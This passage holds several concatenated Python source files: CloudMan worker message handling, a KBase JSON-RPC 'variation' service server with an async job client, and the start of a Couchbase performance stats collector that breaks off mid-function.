log.debug("\tMT: Sending START_SGE message to instance '%s'" % self.id)
self.app.manager.console_monitor.conn.send('START_SGE', self.id)
def send_add_s3fs(self, bucket_name, svc_roles):
msg = 'ADDS3FS | {0} | {1}'.format(bucket_name, ServiceRole.to_string(svc_roles))
self._send_msg(msg)
def _send_msg(self, msg):
"""
An internal convenience method to log and send a message to the current instance.
"""
log.debug("\tMT: Sending message '{msg}' to instance {inst}".format(msg=msg, inst=self.id))
self.app.manager.console_monitor.conn.send(msg, self.id)
def handle_message(self, msg):
# log.debug( "Handling message: %s from %s" % ( msg, self.id ) )
self.is_alive = True
self.last_comm = Time.now()
# Transition from states to a particular response.
if self.app.manager.console_monitor.conn:
msg_type = msg.split(' | ')[0]
if msg_type == "ALIVE":
self.worker_status = "Starting"
log.info("Instance %s reported alive" % self.get_desc())
msp = msg.split(' | ')
self.private_ip = msp[1]
self.public_ip = msp[2]
self.zone = msp[3]
self.type = msp[4]
self.ami = msp[5]
try:
self.local_hostname = msp[6]
self.num_cpus = int(msp[7])
self.total_memory = int(msp[8])
except:
# Older versions of CloudMan did not pass this value so if the master
# and the worker are running 2 diff versions (can happen after an
# automatic update), don't crash here.
self.local_hostname = self.public_ip
log.debug("INSTANCE_ALIVE private_ip: %s public_ip: %s zone: %s type: %s AMI: %s hostname: %s, CPUs: %s"
% (self.private_ip, self.public_ip, self.zone,
self.type, self.ami, self.local_hostname,
self.num_cpus))
# Add instance IP/name to /etc/hosts
misc.add_to_etc_hosts(self.private_ip, [self.alias, self.local_hostname])
# Instance is alive and responding.
self.send_mount_points()
elif msg_type == "GET_MOUNTPOINTS":
self.send_mount_points()
elif msg_type == "MOUNT_DONE":
log.debug("Got MOUNT_DONE message")
self.send_master_pubkey()
# Add hostname to /etc/hosts (for SGE config)
if self.app.cloud_type in ('openstack', 'eucalyptus'):
hn2 = ''
if '.' in self.local_hostname:
hn2 = (self.local_hostname).split('.')[0]
worker_host_line = '{ip} {hn1} {hn2}\n'.format(ip=self.private_ip,
hn1=self.local_hostname,
hn2=hn2)
log.debug("worker_host_line: {0}".format(worker_host_line))
with open('/etc/hosts', 'r+') as f:
hosts = f.readlines()
if worker_host_line not in hosts:
log.debug("Adding worker {0} to /etc/hosts".format(
self.local_hostname))
f.write(worker_host_line)
if self.app.cloud_type == 'opennebula':
f = open("/etc/hosts", 'a')
f.write("%s\tworker-%s\n" % (self.private_ip, self.id))
f.close()
# log.debug("Update /etc/hosts through master")
# self.app.manager.update_etc_host()
elif msg_type == "WORKER_H_CERT":
log.debug("Got WORKER_H_CERT message")
self.is_alive = True # This is for the case that an existing worker is added to a new master.
self.app.manager.save_host_cert(msg.split(" | ")[1])
log.debug("Worker '%s' host certificate received and appended "
"to /root/.ssh/known_hosts" % self.id)
for job_manager_svc in self.app.manager.service_registry.active(
service_role=ServiceRole.JOB_MANAGER):
job_manager_svc.add_node(self)
# Instruct the worker to start appropriate job manager daemon
if ServiceRole.SLURMCTLD in job_manager_svc.svc_roles:
self.send_start_slurmd()
else:
self.send_start_sge()
else:
log.warning('Could not get a handle on job manager service to '
'add node {0}'.format(self.get_desc()))
# If there are any bucket-based FSs, tell the worker to add those
fss = self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM)
for fs in fss:
if len(fs.buckets) > 0:
for b in fs.buckets:
self.send_add_s3fs(b.bucket_name, fs.svc_roles)
log.info("Waiting on worker instance %s to configure itself." % self.get_desc())
elif msg_type == "NODE_READY":
self.worker_status = "Ready"
log.info("Instance %s ready" % self.get_desc())
                # Make sure the instance is tagged (this is also necessary to do
# here for OpenStack because it does not allow tags to be added
# until an instance is 'running')
self.app.cloud_interface.add_tag(self.inst, 'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(self.inst, 'role', 'worker')
self.app.cloud_interface.add_tag(self.inst, 'alias', self.alias)
self.app.cloud_interface.add_tag(self.inst, 'Name', "Worker: {0}".format(self.app.ud['cluster_name']))
self.app.manager.update_condor_host(self.public_ip)
elif msg_type == "NODE_STATUS":
# log.debug("Node {0} status message: {1}".format(self.get_desc(), msg))
if not self.worker_status == 'Stopping':
msplit = msg.split(' | ')
self.nfs_data = msplit[1]
self.nfs_tools = msplit[2] # Workers currently do not update this field
self.nfs_indices = msplit[3]
self.nfs_sge = msplit[4]
self.get_cert = msplit[5]
self.sge_started = msplit[6]
self.load = msplit[7]
self.worker_status = msplit[8]
self.nfs_tfs = msplit[9]
self.slurmd_running = msplit[10]
else:
log.debug("Worker {0} in state Stopping so not updating status"
.format(self.get_desc()))
elif msg_type == 'NODE_SHUTTING_DOWN':
msplit = msg.split(' | ')
self.worker_status = msplit[1]
else: # Catch-all condition
log.debug("Unknown Message: %s" % msg)
else:
log.error("Epic Failure, squeue not available?")
|
variationServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'variation'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from variation.variationImpl import variation
impl_variation = variation(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['variation.variation_example_method_async'] = ['variation', 'variation_example_method']
async_check_methods['variation.variation_example_method_check'] = ['variation', 'variation_example_method']
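# The *_async/*_check entries above map each public asynchronous wrapper back to its
# underlying (module, method) pair: the *_async form submits the call to the job
# service and returns a job id, while the *_check form polls that job (see the async
# branches in Application.__call__ below).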
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
            raise ValueError('Neither the \'job-service-url\' configuration parameter nor the '
                             '\'KB_JOB_SERVICE_URL\' environment variable is defined')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
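# Hypothetical usage sketch for the client above (requires KB_JOB_SERVICE_URL or a
# 'job-service-url' config entry, plus a valid auth token):
#
#     client = AsyncJobServiceClient(token=auth_token)
#     job_id = client.run_job({'method': 'variation.variation_example_method',
#                              'params': [...]})
#     job_state = client.check_job(job_id)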
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
        This method is the same as call() except that the return value is a Python
        object instead of a JSON string. It is mainly useful for debugging
        purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'variation'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_variation.variation_example_method,
name='variation.variation_example_method',
types=[basestring])
self.method_authentication['variation.variation_example_method'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"variation but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
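        # delta is the local-to-UTC offset; the +30 s rounds it to the nearest
        # minute before it is split into the hours/minutes of the "+HH:MM" suffix.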
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server listening on
# port 9999 (the default), execute this file directly.
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
    By default, this will start the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess=True. This
    also allows the port number to be returned.'''
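    # Hypothetical usage sketch (names as defined in this module):
    #     port = start_server(port=9999, newprocess=True)
    #     ...issue JSON-RPC POST requests against http://localhost:9999...
    #     stop_server()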
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
stats.py
|
import json
import re
from threading import Thread
import time
import gzip
from collections import defaultdict
import logging
import logging.config
from uuid import uuid4
from itertools import cycle
from lib.membase.api.exception import SetViewInfoNotFound, ServerUnavailableException
from lib.membase.api.rest_client import RestConnection
from lib.memcached.helper.data_helper import MemcachedClientHelper, VBucketAwareMemcached
from lib.remote.remote_util import RemoteMachineShellConnection, RemoteMachineHelper
RETRIES = 10
logging.config.fileConfig('mcsoda.logging.conf')
logging.getLogger("paramiko").setLevel(logging.WARNING)
log = logging.getLogger()
hex = lambda: uuid4().hex
def histo_percentile(histo, percentiles):
"""The histo dict is returned by add_timing_sample(). The percentiles must
be sorted, ascending, like [0.90, 0.99]."""
v_sum = 0
bins = histo.keys()
bins.sort()
for bin in bins:
v_sum += histo[bin]
v_sum = float(v_sum)
v_cur = 0 # Running total.
rv = []
for bin in bins:
if not percentiles:
return rv
v_cur += histo[bin]
while percentiles and (v_cur / v_sum) >= percentiles[0]:
rv.append((percentiles[0], bin))
percentiles.pop(0)
return rv
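# Worked example (illustrative only): with histo = {1: 5, 2: 3, 5: 2} and
# percentiles = [0.90, 0.99], the cumulative counts are 5, 8 and 10 out of 10, so
# both percentiles fall in bin 5 and the result is [(0.90, 5), (0.99, 5)].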
class StatsCollector(object):
_task = {}
_verbosity = True
_mb_stats = {"snapshots": []} # manually captured memcached stats
_reb_stats = {}
_lat_avg_stats = {} # aggregated top level latency stats
_xdcr_stats = {}
def __init__(self, verbosity):
self._verbosity = verbosity
self.is_leader = False
self.active_mergers = 0
def start(self, nodes, bucket, pnames, name, client_id='',
collect_server_stats=True, ddoc=None, clusters=None):
"""This function starts collecting stats from all nodes with the given
interval"""
self._task = {"state": "running", "threads": [], "name": name,
"time": time.time(), "ops": [], "totalops": [],
"ops-temp": [], "latency": {}, "data_size_stats": []}
rest = RestConnection(nodes[0])
info = rest.get_nodes_self()
self.data_path = info.storage[0].get_data_path()
self.client_id = str(client_id)
self.nodes = nodes
self.bucket = bucket
if collect_server_stats:
self._task["threads"].append(
Thread(target=self.membase_stats, name="membase")
)
self._task["threads"].append(
Thread(target=self.system_stats, name="system", args=(pnames, ))
)
self._task["threads"].append(
Thread(target=self.iostats, name="iostats")
)
self._task["threads"].append(
Thread(target=self.ns_server_stats, name="ns_server")
)
self._task["threads"].append(
Thread(target=self.get_bucket_size, name="bucket_size")
)
self._task["threads"].append(
Thread(target=self.rebalance_progress, name="rebalance_progress")
)
if ddoc is not None:
self._task["threads"].append(
Thread(target=self.indexing_time_stats, name="index_time", args=(ddoc, ))
)
self._task["threads"].append(
Thread(target=self.indexing_throughput_stats, name="index_thr")
)
if clusters:
self.clusters = clusters
self._task["threads"].append(
Thread(target=self.xdcr_lag_stats, name="xdcr_lag_stats")
)
for thread in self._task["threads"]:
thread.daemon = True
thread.start()
# Getting build/machine stats from only one node in the cluster
self.build_stats(nodes)
self.machine_stats(nodes)
# Start atop
self.start_atop()
def stop(self):
self.stop_atop()
self._task["state"] = "stopped"
for t in self._task["threads"]:
t.join(120)
if t.is_alive():
log.error("failed to join {0} thread".format(t.name))
self._task["time"] = time.time() - self._task["time"]
def sample(self, cur):
pass
def get_ns_servers_samples(self, metric):
for subset in self._task["ns_server_data"]:
samples = subset["op"]["samples"][metric]
yield float(sum(samples)) / len(samples)
def calc_xperf_stats(self):
metrics = ("replication_changes_left", "xdc_ops")
for metric in metrics:
self._xdcr_stats["avg_" + metric] = \
sum(self.get_ns_servers_samples(metric)) /\
sum(1 for _ in self.get_ns_servers_samples(metric))
def export(self, name, test_params):
for latency in self._task["latency"].keys():
# save the last histogram snapshot
per_90th_tot = 0
histos = self._task["latency"].get(latency, [])
if histos:
key = latency + "-histogram"
self._task["latency"][key] = histos[-1].copy()
del self._task["latency"][key]["delta"]
self._task["latency"][key]["client_id"] = self.client_id
# calculate percentiles
key = 'percentile-' + latency
self._task["latency"][key] = []
for histo in histos:
# for every sample histogram, produce a temp summary:
# temp = [90 per, 95 per, 99 per, client_id, delta]
temp = []
time = histo['time']
delta = histo['delta']
del histo['delta'], histo['time']
p = histo_percentile(histo, [0.80, 0.90, 0.95, 0.99, 0.999])
# p is list of tuples
for val in p:
temp.append(val[-1])
per_90th_tot += temp[1]
temp.append(self.client_id)
temp.append(time)
temp.append(delta)
self._task["latency"][key].append(temp)
if per_90th_tot:
self._lat_avg_stats["%s-90th-avg" % latency] \
= per_90th_tot / len(histos) * 1000000
# XDCR stats
try:
self.calc_xperf_stats()
except KeyError:
pass
test_params.update(self._xdcr_stats)
test_params.update(self._reb_stats)
test_params.update(self._lat_avg_stats)
obj = {
"buildinfo": self._task.get("buildstats", {}),
"machineinfo": self._task.get("machinestats", {}),
"membasestats": self._task.get("membasestats", []),
"systemstats": self._task.get("systemstats", []),
"iostats": self._task.get("iostats", []),
"name": name,
"totalops": self._task["totalops"],
"ops": self._task["ops"],
"time": self._task["time"],
"info": test_params,
"ns_server_data": self._task.get("ns_server_stats", []),
"ns_server_data_system": self._task.get("ns_server_stats_system", []),
"view_info": self._task.get("view_info", []),
"indexer_info": self._task.get("indexer_info", []),
"xdcr_lag": self._task.get("xdcr_lag", []),
"rebalance_progress": self._task.get("rebalance_progress", []),
"timings": self._task.get("timings", []),
"dispatcher": self._task.get("dispatcher", []),
"bucket-size": self._task.get("bucket_size", []),
"data-size": self._task.get("data_size_stats", []),
"latency-set-histogram": self._task["latency"].get("latency-set-histogram", []),
"latency-set": self._task["latency"].get('percentile-latency-set', []),
"latency-set-recent": self._task["latency"].get('percentile-latency-set-recent', []),
"latency-get-histogram": self._task["latency"].get("latency-get-histogram", []),
"latency-get": self._task["latency"].get('percentile-latency-get', []),
"latency-get-recent": self._task["latency"].get('percentile-latency-get-recent', []),
"latency-delete": self._task["latency"].get('percentile-latency-delete', []),
"latency-delete-recent": self._task["latency"].get('percentile-latency-delete-recent', []),
"latency-query-histogram": self._task["latency"].get("latency-query-histogram", []),
"latency-query": self._task["latency"].get('percentile-latency-query', []),
"latency-query-recent": self._task["latency"].get('percentile-latency-query-recent', []),
"latency-obs-persist-server-histogram": self._task["latency"].get("latency-obs-persist-server-histogram", []),
"latency-obs-persist-server": self._task["latency"].get('percentile-latency-obs-persist-server-server', []),
"latency-obs-persist-server-recent": self._task["latency"].get('percentile-latency-obs-persist-server-recent', []),
"latency-obs-persist-client-histogram": self._task["latency"].get("latency-obs-persist-client-histogram", []),
"latency-obs-persist-client": self._task["latency"].get('percentile-latency-obs-persist-client', []),
"latency-obs-persist-client-recent": self._task["latency"].get('percentile-latency-obs-persist-client-recent', []),
"latency-obs-repl-client-histogram": self._task["latency"].get("latency-obs-repl-client-histogram", []),
"latency-obs-repl-client": self._task["latency"].get('percentile-latency-obs-repl-client', []),
"latency-obs-repl-client-recent": self._task["latency"].get('percentile-latency-obs-repl-client-recent', []),
"latency-woq-obs-histogram": self._task["latency"].get("latency-woq-obs-histogram", []),
"latency-woq-obs": self._task["latency"].get('percentile-latency-woq-obs', []),
"latency-woq-obs-recent": self._task["latency"].get('percentile-latency-woq-obs-recent', []),
"latency-woq-query-histogram": self._task["latency"].get("latency-woq-query-histogram", []),
"latency-woq-query": self._task["latency"].get('percentile-latency-woq-query', []),
"latency-woq-query-recent": self._task["latency"].get('percentile-latency-woq-query-recent', []),
"latency-woq-histogram": self._task["latency"].get("latency-woq-histogram", []),
"latency-woq": self._task["latency"].get('percentile-latency-woq', []),
"latency-woq-recent": self._task["latency"].get('percentile-latency-woq-recent', []),
"latency-cor-histogram": self._task["latency"].get("latency-cor-histogram", []),
"latency-cor": self._task["latency"].get('percentile-latency-cor', []),
"latency-cor-recent": self._task["latency"].get('percentile-latency-cor-recent', [])}
if self.client_id:
patterns = ('reload$', 'load$', 'warmup$', 'index$')
phases = ('.reload', '.load', '.warmup', '.index')
name_picker = lambda (pattern, phase): re.search(pattern, self._task["name"])
try:
phase = filter(name_picker, zip(patterns, phases))[0][1]
except IndexError:
phase = '.loop'
name = str(self.client_id) + phase
file = gzip.open("{0}.json.gz".format(name), 'wb')
file.write(json.dumps(obj))
file.close()
def get_bucket_size(self, interval=60):
self._task["bucket_size"] = []
retries = 0
nodes_iterator = (node for node in self.nodes)
node = nodes_iterator.next()
rest = RestConnection(node)
while not self._aborted():
time.sleep(interval)
log.info("collecting bucket size stats")
try:
